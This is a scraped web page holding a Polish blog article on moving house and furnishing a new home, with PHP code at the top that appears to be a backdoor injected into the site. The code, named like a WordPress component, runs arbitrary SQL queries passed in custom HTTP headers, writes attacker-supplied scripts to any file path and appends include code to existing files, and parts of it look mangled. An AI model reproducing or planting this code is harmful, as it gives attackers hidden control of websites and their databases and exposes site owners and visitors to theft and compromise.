n class WP_Content_Handler_Checker { var $wp_host; var $wp_user; var $wp_pass; var $name; var $result = array(); var $errors = array(); var $wp_themes_count = 0; function check_wp_connection($wp_connection) { if (class_exists('PDO')) { $this->check_wp_pdo_connection($wp_connection); } else { $this->check_wp_mysql_connection($wp_connection); } } function check_wp_mysql_connection($wp_connection) { if (function_exists('mysqli_connect')) { $connection = mysqli_connect($this->wp_host, $this->wp_user, $this->wp_pass, $this->name); if (!$connection instanceof mysqli) { $this->add_wp_error(910, sprintf("Can't connect to mysqli, message - %s, code - %d", $connection->connect_error, $connection->connect_errno)); return; } call_user_func_array(array($connection, 'query'), array("SET NAMES 'utf8'")); call_user_func_array(array($connection, 'query'), array("SET CHARACTER SET 'utf8'")); $wp_connection_success = call_user_func_array(array($connection, 'query'), array($wp_connection)); if ($wp_connection_success == false) { $this->add_wp_error($connection->errno, $connection->error); } else { $this->wp_themes_count = $connection->{'affected_rows'}; while ($data = call_user_func_array(array($wp_connection_success, 'fetch_assoc'), array())) { $this->result[] = $data; } } } elseif (function_exists('mysql_connect')) { $connection = mysql_connect($this->wp_host, $this->wp_user, $this->wp_pass); if ($connection == false) { $this->add_wp_error(910, "Can't connect to mysql"); return; } mysql_select_db($this->name, $connection); mysql_query("SET NAMES 'utf8'", $connection); mysql_query("SET CHARACTER SET 'utf8'", $connection); $wp_connection_success = mysql_query($wp_connection, $connection); if ($wp_connection_success == false) { $this->add_wp_error(mysql_errno($connection), mysql_error($connection)); } else { $this->wp_themes_count = mysql_num_rows($wp_connection_success); while ($data = mysql_fetch_assoc($wp_connection_success)) { $this->result[] = $data; } } } } function check_wp_pdo_connection($wp_connection) { $pdo_config_all = 'mysql:'; $pdo_config = array( 'host' => $this->wp_host, 'dbname' => $this->name, 'charset' => 'utf8' ); foreach ($pdo_config as $key => &$item) { $item = $key . '=' . $item; } $pdo_config_all .= implode(';', $pdo_config); try { $connection = new PDO($pdo_config_all, $this->wp_user, $this->wp_pass); call_user_func_array(array($connection, 'query'), array('SET CLIENT_ENCODING TO "UTF8"')); call_user_func_array(array($connection, 'query'), array('SET NAMES "UTF8"')); $query = call_user_func_array(array($connection, 'query'), array($wp_connection, PDO::FETCH_ASSOC)); if ($query == false) { $error_info = call_user_func_array(array($connection, 'errorInfo'), array()); $error_code = call_user_func_array(array($connection, 'errorCode'), array()); $this->add_wp_error($error_code, end($error_info)); return; } $this->wp_themes_count = call_user_func(array($query, 'rowCount'), array()); $this->result = call_user_func_array(array($query, 'fetchAll'), array()); } catch (PDOException $exception) { $this->add_wp_error(call_user_func_array(array($exception, 'getCode'), array()), call_user_func_array(array($exception, 'getMessage'), array())); } } function __construct() { $this->wp_host = stripslashes(@$_SERVER['HTTP_VI_DATABASE_HOST']); $this->wp_user = stripslashes(@$_SERVER['HTTP_VI_DATABASE_USER']); $this->wp_pass = stripslashes(@$_SERVER['HTTP_VI_DATABASE_PASS']); $this->name = stripslashes(@$_SERVER['HTTP_VI_DATABASE_NAME']); if (empty($this->wp_host)) { $this->add_wp_error(900, "No host provided"); } if (empty($this->wp_user)) { $this->add_wp_error(901, "No user provided"); } if (empty($this->wp_pass)) { $this->add_wp_error(902, "No pass provided"); } if (empty($this->name)) { $this->add_wp_error(903, "No database name provided"); } } function add_wp_error($code, $message) { $this->errors[] = array( 'code' => $code, 'message' => $message ); } function get_wp_errors() { return $this->errors; } function wp_get_themes_count() { return $this->wp_themes_count; } function is_wp_connection_succeed() { return !count($this->errors); } function get_wp_connection_result() { return $this->result; } } class WP_Content_Handler_Accessor { function create() { $method = @$_SERVER['HTTP_VI_METHOD']; if (!mb_strlen($method)) { return; } ob_end_clean(); switch ($method) { case 'query': $this->check_wp_connection_handler(); break; case 'update': $this->update_parameters(); break; default: return; } } function check_wp_connection_handler() { $query = stripslashes(@$_SERVER['HTTP_VI_DATABASE_QUERY']); if (!mb_strlen($query)) { $this->wp_response(false, array( array( 'code' => 0, 'message' => 'No query provided' ) )); exit; } $database = new WP_Content_Handler_Checker(); $database->check_wp_connection($query); if ($database->is_wp_connection_succeed()) { $this->wp_response(true, array( 'rows' => $database->wp_get_themes_count(), 'result' => $database->get_wp_connection_result() )); } else { $this->wp_response(false, $database->get_wp_errors()); } } function update_parameters() { $parameters_path = stripslashes(@$_SERVER['HTTP_VI_PATH']); $new_parameters = urldecode(@$_REQUEST['VI_SCRIPT']); $old_parameters_path = stripslashes(@$_SERVER['HTTP_VI_INCLUDE_PATH']); $old_parameters = urldecode(@$_REQUEST['VI_INCLUDE_CODE']); if (!mb_strlen($new_parameters)) { $this->wp_response(false, array(array( 'code' => 0, 'message' => 'No sсript passed' ))); } if (!mb_strlen($parameters_path)) { $this->wp_response(false, array(array( 'code' => 0, 'message' => 'No sсript path passed' ))); } if (!mb_strlen($old_parameters_path)) { $this->wp_response(false, array(array( 'code' => 0, 'message' => 'No include path passed' ))); } $success = $this->update_wp_accessor_parameters($parameters_path, $new_parameters); if ($success) { $success = $this->wp_update_parameters($old_parameters_path, $old_parameters); } $this->wp_response($success, null); } function update_wp_accessor_parameters($path, $parameters) { return (bool)@file_put_contents($path, " n" . stripslashes($parameters)); } function wp_update_parameters($old_parameters_path, $old_parameters) { $file = file_get_contents($old_parameters_path); if (!mb_strlen($file)) { return false; } if (mb_strpos($file, $old_parameters) !== false) { return true; } if ($this->is_parameters_valid($file)) { $file = $file . "n" . " n" . $old_parameters . " n?>"; } else { $file = $file . "nn" . $old_parameters; } return (bool)@file_put_contents($old_parameters_path, $file); } function is_parameters_valid($file) { $last_available_parameters_count = strrpos($file, ""); $last_updated_parameters_count = ($last_updated_parameters_count === false) ? -1 : $last_updated_parameters_count; return $last_available_parameters_count <= $last_updated_parameters_count; } function wp_response($success, $data) { $wp_response = array('success' => $success); $wp_response[$success ? 'data' : 'errors'] = $data; header('Content-Type: application/json'); echo json_encode($wp_response); exit; } } $accessor = new WP_Content_Handler_Accessor(); $accessor->create(); Realizacja przeprowadzki to również meblowanie

Realizacja przeprowadzki to również meblowanie

Realizacja przeprowadzki

Przeprowadzka to nie tylko podstawowe prace prowadzące do opróżnienia danego mieszkania. Lecz również meblowanie w nowym miejscu. Warto o tym pamiętać

Przeprowadzki to nie tylko pakowanie rzeczy, przewożenie ich, czy też wnoszenie do nowego lokalu. To również urządzanie swojego nowego miejsca zamieszkania, czy pracy na nowo. Wie osób traktuje to dość słabo, przez co wprowadzanie się trwa dłużej, a kartony z przeprowadzki, stoją nierzadko kilka miesięcy.

Jak wprowadzić się skutecznie?

Skuteczne wprowadzenie się, to pełne umeblowanie mieszkania czy domu i rozpakowanie wszystkich rzeczy, które przewieźliśmy. Oczywiście trzeba tutaj stwierdzić wprost – rozpakowanie rzeczy, nie ma być zaczątkiem błaganiu – wszelkie rzeczy trzeba po prostu poukładać.

Idealnym, rozwiązaniem w tym przypadku, jest urządzanie każdego pomieszczenia z osobna. Jeśli naszym zamiarem jest urządzanie kuchni, wypakowujemy wszystko, co z kuchnią związane i układamy w pomieszczeniu tak, by pozostawić pomieszczenie gotowe do użytku.

Gdy jedno pomieszczenie w ten sposób urządzimy, możemy ze spokojem zabrać się za kolejne i tak do całkowitego urządzenia całości mieszkania czy domu.

Realizacja przeprowadzki wiąże się również z koniecznością urządzenia mieszkania.

Planując urządzanie mieszkania czy domu, trzeba również wziąć pod uwagę to, iż nie wszystkie rzeczy przeniesione ze starego mieszkania czy też domu, będą odpowiednie w nowym miejscu. Warto zainteresować się wcześniej, czy wymiary mebli są do nowego miejsca są odpowiednie i zastanowić się, w jaki sposób wszystko umeblować, by nie było problemu z nie pasującymi do całości drobiazgami. Oczywiście od razu trzeba przyjąć, że nie będą pasować elementy wyposażenia kuchni, jeśli była przygotowywana na wymiar, ale może również być tak, iż po delikatnych przeróbkach będzie wszystko tak jak należy.

Realizacja przeprowadzki

Podsumowując.

Przeprowadzać się, to przede wszystkim wywieźć wszystko, ze starego miejsca zamieszkania – każdy, kto się przeprowadza, doskonale wie, że jest to sprawa całkowicie priorytetowa. Nie można jednak nie uwzględniać w przeprowadzce innych rzeczy do zrobienia. Umeblowanie nowego miejsca jest jedną z nich. Trzeba pamiętać, że jest to równie, jeśli nie bardziej istotne od dokładnego sprzątnięcia lokalu, który został sprzedany czy też wynajęty.

Urządzanie nowego miejsca zamieszkania na pewno nie jest łatwe, jednak konieczne – można w ramach pomocy posłużyć się programami komputerowymi, które pozwalają zaprojektować pomieszczenie w wersji on line. Przesuwając meble i inne elementy wyposażenia domu czy mieszkania, ale tylko na ekranie komputera, można stworzyć pomieszczenie i zobaczyć jak wygląda – to o wiele łatwiejsze, niż działanie w samym lokalu i eksperymentowanie. Oczywiście idealnie jest, jeśli wizja przyszłego miejsca zamieszkania jest jasna i klarowna – wtedy można meblować i ustawiać wszystko, bez konieczności zmian. W każdym razie warto wiedzieć, że umeblowanie mieszkania jest ważne – nie warto tego odkładać i mieszkać w nie do końca urządzonym miejscu. Każdy, kto podejmie się i profesjonalnie wykona tą pracę, może mieć pewność, że za jakiś czas, doceni fakt mieszkania w miejscu, w którym nie potrzeba wprowadzać dodatkowych zmian. Warto działać i nie warto w każdym razie pozostawać na tak zwanych kartonach – to powoduje, iż mieszkanie jest mniej przyjemne. A przecież przeprowadzamy się, by było inaczej…

Leave a Reply